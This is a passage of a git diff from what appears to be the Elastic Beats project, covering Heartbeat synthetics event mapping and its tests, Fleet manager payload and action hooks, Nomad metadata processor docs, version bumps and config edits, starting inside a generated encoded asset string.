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" } diff --git a/x-pack/heartbeat/monitors/browser/synthexec/synthtypes.go b/x-pack/heartbeat/monitors/browser/synthexec/synthtypes.go index 4d293d86d72..40cf2e06242 100644 --- a/x-pack/heartbeat/monitors/browser/synthexec/synthtypes.go +++ b/x-pack/heartbeat/monitors/browser/synthexec/synthtypes.go @@ -27,18 +27,35 @@ type SynthEvent struct { Error *SynthError `json:"error"` URL string `json:"url"` Status string `json:"status"` + RootFields common.MapStr `json:"root_fields"` index int } func (se SynthEvent) ToMap() (m common.MapStr) { // We don't add @timestamp to the map string since that's specially handled in beat.Event - m = common.MapStr{ + // Use the root fields as a base, and layer additional, stricter, fields on top + if se.RootFields != nil { + m = se.RootFields + // We handle url specially since it can be passed as a string, + // but expanded to match ECS + if urlStr, ok := m["url"].(string); ok { + if se.URL == "" { + se.URL = urlStr + } + } + } else { + m = common.MapStr{} + } + + m.DeepUpdate(common.MapStr{ "synthetics": common.MapStr{ "type": se.Type, "package_version": se.PackageVersion, - "payload": se.Payload, "index": se.index, }, + }) + if len(se.Payload) > 0 { + m.Put("synthetics.payload", se.Payload) } if se.Blob != "" { m.Put("synthetics.blob", se.Blob) @@ -61,7 +78,7 @@ func (se SynthEvent) ToMap() (m common.MapStr) { if e != nil { logp.Warn("Could not parse synthetics URL '%s': %s", se.URL, e.Error()) } else { - m["url"] = wrappers.URLFields(u) + m.Put("url", wrappers.URLFields(u)) } } diff --git a/x-pack/heartbeat/monitors/browser/synthexec/synthtypes_test.go b/x-pack/heartbeat/monitors/browser/synthexec/synthtypes_test.go index 775c5380137..daa2a710900 100644 --- a/x-pack/heartbeat/monitors/browser/synthexec/synthtypes_test.go +++ b/x-pack/heartbeat/monitors/browser/synthexec/synthtypes_test.go @@ -5,9 +5,17 @@ package synthexec import ( + "encoding/json" + "net/url" "testing" "time" + "github.com/elastic/beats/v7/heartbeat/monitors/wrappers" + + "github.com/elastic/beats/v7/libbeat/common" + "github.com/elastic/go-lookslike" + "github.com/elastic/go-lookslike/testslike" + "github.com/stretchr/testify/require" ) @@ -15,3 +23,117 @@ func TestSynthEventTimestamp(t *testing.T) { se := SynthEvent{TimestampEpochMicros: 1000} // 1ms require.Equal(t, time.Unix(0, int64(time.Millisecond)), se.Timestamp()) } + +func TestToMap(t *testing.T) { + testUrl, _ := url.Parse("http://testurl") + + type testCase struct { + name string + source common.MapStr + expected common.MapStr + } + + testCases := []testCase{ + { + "root fields with URL", + common.MapStr{ + "type": "journey/start", + "package_version": "1.2.3", + "root_fields": map[string]interface{}{ + "synthetics": map[string]interface{}{ + "nested": "v1", + }, + "truly_at_root": "v2", + }, + "url": testUrl.String(), + }, + common.MapStr{ + "synthetics": common.MapStr{ + "type": "journey/start", + "package_version": "1.2.3", + "nested": "v1", + }, + "url": wrappers.URLFields(testUrl), + "truly_at_root": "v2", + }, + }, + { + "root fields, step metadata", + common.MapStr{ + "type": "step/start", + "package_version": "1.2.3", + "journey": common.MapStr{"name": "MyJourney", "id": "MyJourney"}, + "step": common.MapStr{"name": "MyStep", "status": "success", "index": 42}, + "root_fields": map[string]interface{}{ + "synthetics": map[string]interface{}{ + "nested": "v1", + }, + "truly_at_root": "v2", + }, + }, + common.MapStr{ + "synthetics": common.MapStr{ + "type": "step/start", + "package_version": "1.2.3", + "nested": "v1", + "journey": common.MapStr{"name": "MyJourney", "id": "MyJourney"}, + "step": common.MapStr{"name": "MyStep", "status": "success", "index": 42}, + }, + "truly_at_root": "v2", + }, + }, + { + "weird error, and blob, no URL", + common.MapStr{ + "type": "someType", + "package_version": "1.2.3", + "journey": common.MapStr{"name": "MyJourney", "id": "MyJourney"}, + "step": common.MapStr{"name": "MyStep", "index": 42, "status": "down"}, + "error": common.MapStr{ + "name": "MyErrorName", + "message": "MyErrorMessage", + "stack": "MyErrorStack", + }, + "blob": "ablob", + "blob_mime": "application/weird", + }, + common.MapStr{ + "synthetics": common.MapStr{ + "type": "someType", + "package_version": "1.2.3", + "journey": common.MapStr{"name": "MyJourney", "id": "MyJourney"}, + "step": common.MapStr{"name": "MyStep", "index": 42, "status": "down"}, + "error": common.MapStr{ + "name": "MyErrorName", + "message": "MyErrorMessage", + "stack": "MyErrorStack", + }, + "blob": "ablob", + "blob_mime": "application/weird", + }, + }, + }, + } + + for _, tc := range testCases { + t.Run(tc.name, func(t *testing.T) { + // Actually marshal to JSON and back to test the struct tags for deserialization from JSON + jsonBytes, err := json.Marshal(tc.source) + require.NoError(t, err) + se := &SynthEvent{} + err = json.Unmarshal(jsonBytes, se) + require.NoError(t, err) + + m := se.ToMap() + + // Index will always be zero in thee tests, so helpfully include it + llvalidator := lookslike.Strict(lookslike.Compose( + lookslike.MustCompile(tc.expected), + lookslike.MustCompile(common.MapStr{"synthetics": common.MapStr{"index": 0}}), + )) + + // Test that even deep maps merge correctly + testslike.Test(t, llvalidator, m) + }) + } +} diff --git a/x-pack/heartbeat/sample-synthetics-config/heartbeat.yml b/x-pack/heartbeat/sample-synthetics-config/heartbeat.yml deleted file mode 100644 index 74fc2f4d885..00000000000 --- a/x-pack/heartbeat/sample-synthetics-config/heartbeat.yml +++ /dev/null @@ -1,56 +0,0 @@ ---- -heartbeat.config.monitors: - path: "${path.config}/monitors.d/*.yml" - reload.enabled: false - reload.period: 5s - -heartbeat.monitors: -- type: browser - enabled: true - id: todos-suite - name: Todos Suite - data_stream: - namespace: myns - source: - local: - path: "/home/andrewvc/projects/synthetics/examples/todos/" - schedule: '@every 1m' -- type: http - enabled: true - id: SimpleHTTP - urls: http://www.google.com - schedule: "@every 15s" - name: Simple HTTP - data_stream: - namespace: myns -- type: browser - enabled: false - id: my-monitor - name: My Monitor - data_stream: - namespace: myns - source: - inline: - script: - step("load homepage", async () => { - await page.goto('https://www.elastic.co'); - }); - step("hover over products menu", async () => { - await page.hover('css=[data-nav-item=products]'); - }); - step("failme", async () => { - await page.hhover('css=[data-nav-item=products]'); - }); - schedule: "@every 1m" - -setup.template.settings: - index.number_of_shards: 1 - index.codec: best_compression -setup.kibana: -output.elasticsearch: - hosts: "127.0.0.1:9200" - username: elastic - password: changeme -processors: -- add_observer_metadata: - diff --git a/x-pack/libbeat/Dockerfile b/x-pack/libbeat/Dockerfile index 0c51c2ea88f..17810925ee0 100644 --- a/x-pack/libbeat/Dockerfile +++ b/x-pack/libbeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.9 +FROM golang:1.15.10 RUN \ apt-get update \ diff --git a/x-pack/libbeat/management/fleet/manager.go b/x-pack/libbeat/management/fleet/manager.go index 8aec0af1800..8ec84c10579 100644 --- a/x-pack/libbeat/management/fleet/manager.go +++ b/x-pack/libbeat/management/fleet/manager.go @@ -39,6 +39,7 @@ type Manager struct { lock sync.Mutex status management.Status msg string + payload map[string]interface{} stopFunc func() } @@ -173,7 +174,21 @@ func (cm *Manager) OnConfig(s string) { return } - cm.client.Status(proto.StateObserved_HEALTHY, "Running", nil) + cm.client.Status(proto.StateObserved_HEALTHY, "Running", cm.payload) +} + +func (cm *Manager) RegisterAction(action client.Action) { + cm.client.RegisterAction(action) +} + +func (cm *Manager) UnregisterAction(action client.Action) { + cm.client.UnregisterAction(action) +} + +func (cm *Manager) SetPayload(payload map[string]interface{}) { + cm.lock.Lock() + cm.payload = payload + cm.lock.Unlock() } func (cm *Manager) OnStop() { diff --git a/x-pack/libbeat/management/manager.go b/x-pack/libbeat/management/manager.go index e9dbf7511a4..cfbf72f234c 100644 --- a/x-pack/libbeat/management/manager.go +++ b/x-pack/libbeat/management/manager.go @@ -10,6 +10,7 @@ import ( "time" "github.com/elastic/beats/v7/libbeat/common/reload" + "github.com/elastic/elastic-agent-client/v7/pkg/client" "github.com/gofrs/uuid" @@ -115,6 +116,12 @@ func (cm *ConfigManager) Enabled() bool { return cm.config.Enabled } +func (cm *ConfigManager) RegisterAction(action client.Action) {} + +func (cm *ConfigManager) UnregisterAction(action client.Action) {} + +func (cm *ConfigManager) SetPayload(map[string]interface{}) {} + // Start the config manager func (cm *ConfigManager) Start(_ func()) { if !cm.Enabled() { diff --git a/x-pack/libbeat/processors/add_nomad_metadata/docs/add_nomad_metadata.asciidoc b/x-pack/libbeat/processors/add_nomad_metadata/docs/add_nomad_metadata.asciidoc new file mode 100644 index 00000000000..1ab6b8cab03 --- /dev/null +++ b/x-pack/libbeat/processors/add_nomad_metadata/docs/add_nomad_metadata.asciidoc @@ -0,0 +1,166 @@ +[[add-nomad-metadata]] +[role="xpack"] +=== Add Nomad metadata + +++++ +add_nomad_metadata +++++ + +experimental[] + +The `add_nomad_metadata` processor adds fields with relevant metadata for +applications deployed in Nomad. + +Each event is annotated with the following information: + +* Allocation name, identifier and status. +* Job name and type. +* Namespace where the job is deployed. +* Datacenter and region where the agent runnning the allocation is located. + +[source,yaml] +------------------------------------------------------------------------------- +processors: + - add_nomad_metadata: ~ +------------------------------------------------------------------------------- + +It has the following settings to configure the connection: + +`address`:: (Optional) The URL of the agent API used to request the metadata. It +uses `http://127.0.0.1:4646` by default. +`namespace`:: (Optional) Namespace to watch. If set, only events for allocations +in this namespace will be annotated. +`region`:: (Optional) Region to watch. If set, only events for allocations in +this region will be annotated. +`secretID`:: (Optional) SecretID to use when connecting with the agent API. +`refresh_interval`:: (Optional) Interval used to updated the cached metadata. It +defaults to 30 seconds. +`cleanup_timeout`:: (Optional) After an allocation has been removed, time to +wait before cleaning up their associated resources. This is useful if you expect +to receive events after an allocation has been removed, what can happen when +collecting logs. It defaults to 60 seconds. + + +You can decide if {beatname_uc} should annotate events related to allocations in +local node or on the whole cluster configuring the scope with the following +settings: + +`scope`:: (Optional) Scope of the resources to watch. It can be `node` to get +metadata only for the allocations in a single agent, or `global`, to get metadata +for allocations running on any agent. It defaults to `node`. +`node`:: (Optional) When using `scope: node`, use `node` to specify the name of +the local node if it cannot be discovered automatically. + +For example the following configuration could be used if {beatname_uc} is +collecting events from all the allocations in the cluster: + +[source,yaml] +------------------------------------------------------------------------------- +processors: + - add_nomad_metadata: + scope: global +------------------------------------------------------------------------------- + +==== Indexers and matchers + +Indexers and matchers are used to correlate fields in events with actual +metadata. {beatname_uc} uses this information to know what metadata to include +in each event. + +===== Indexers + +Indexers use allocation metadata to create unique identifiers for each one of +the pods. + +Avaliable indexers are: +`allocation_name`:: Identifies allocations by its name and namespace (as +`/) +`allocation_uuid`:: Identifies allocations by its unique identifier. +// Review examples below when new indexers are added with network information. + +===== Matchers + +Matchers are used to construct the lookup keys that match with the identifiers +created by indexes. + +===== `field_format` + +Looks up allocation metadata using a key created with a string format that can include +event fields. + +This matcher has an option `format` to define the string format. This string +format can contain placeholders for any field in the event. + +For example, the following configuration uses the `allocation_name` indexer to identify +the allocation metadata by its name and namespace, and uses custom fields +existing in the event as match keys: + +[source,yaml] +------------------------------------------------------------------------------- +processors: +- add_nomad_metadata: + ... + default_indexers.enabled: false + default_matchers.enabled: false + indexers: + - allocation_name: + matchers: + - field_format: + format: '%{[labels.nomad_namespace]}/%{[fields.nomad_alloc_name]}' +------------------------------------------------------------------------------- + +===== `fields` + +Looks up allocation metadata using as key the value of some specific fields. When +multiple fields are defined, the first one included in the event is used. + +This matcher has an option `lookup_fields` to define the fields whose value will +be used for lookup. + +For example, the following configuration uses the `allocation_uuid` indexer to +identify allocations, and defines a matcher that uses some fields where the +allocation UUID can be found for lookup, the first it finds in the event: + +[source,yaml] +------------------------------------------------------------------------------- +processors: +- add_nomad_metadata: + ... + default_indexers.enabled: false + default_matchers.enabled: false + indexers: + - allocation_uuid: + matchers: + - fields: + lookup_fields: ['host.name', 'fields.nomad_alloc_uuid'] +------------------------------------------------------------------------------- + +ifdef::has_nomad_logs_path_matcher[] +===== `logs_path` + +Looks up allocation metadata using identifiers extracted from the log path stored in +the `log.file.path` field. + +This matcher has an optional `logs_path` option with the base path of the +directory containing the logs for the local agent. + +The default configuration is able to lookup the metadata using the allocation +UUID when the logs are collected under `/var/lib/nomad`. + +For example the following configuration would use the allocation UUID when the logs +are collected from `/var/lib/NomadClient001/alloc//alloc/logs/...`. + +[source,yaml] +------------------------------------------------------------------------------- +processors: +- add_nomad_metadata: + ... + default_indexers.enabled: false + default_matchers.enabled: false + indexers: + - allocation_uuid: + matchers: + - logs_path: + logs_path: '/var/lib/NomadClient001' +------------------------------------------------------------------------------- +endif::has_nomad_logs_path_matcher[] diff --git a/x-pack/metricbeat/cmd/root.go b/x-pack/metricbeat/cmd/root.go index c1822a428b8..242657049be 100644 --- a/x-pack/metricbeat/cmd/root.go +++ b/x-pack/metricbeat/cmd/root.go @@ -31,7 +31,7 @@ const ( Name = "metricbeat" // ecsVersion specifies the version of ECS that this beat is implementing. - ecsVersion = "1.8.0" + ecsVersion = "1.9.0" ) // RootCmd to handle beats cli diff --git a/x-pack/metricbeat/metricbeat.reference.yml b/x-pack/metricbeat/metricbeat.reference.yml index be76277068f..4b4d7f76e48 100644 --- a/x-pack/metricbeat/metricbeat.reference.yml +++ b/x-pack/metricbeat/metricbeat.reference.yml @@ -787,6 +787,10 @@ metricbeat.modules: #username: "" #password: "" + # SASL authentication mechanism used. Can be one of PLAIN, SCRAM-SHA-256 or SCRAM-SHA-512. + # Defaults to PLAIN when `username` and `password` are configured. + #sasl.mechanism: '' + # Metrics collected from a Kafka broker using Jolokia #- module: kafka # metricsets: @@ -1120,6 +1124,10 @@ metricbeat.modules: # Stats about every PostgreSQL process - activity + # Stats about every statement executed in the server. It requires the + # `pg_stats_statement` library to be configured in the server. + #- statement + period: 10s # The host must be passed as PostgreSQL URL. Example: diff --git a/x-pack/osquerybeat/.editorconfig b/x-pack/osquerybeat/.editorconfig new file mode 100644 index 00000000000..a92dc2185bd --- /dev/null +++ b/x-pack/osquerybeat/.editorconfig @@ -0,0 +1,27 @@ +# See: http://editorconfig.org +root = true + +[*] +charset = utf-8 +end_of_line = lf +insert_final_newline = true +trim_trailing_whitespace = true + +[*.json] +indent_size = 4 +indent_style = space + +[*.py] +indent_style = space +indent_size = 4 + +[*.yml] +indent_style = space +indent_size = 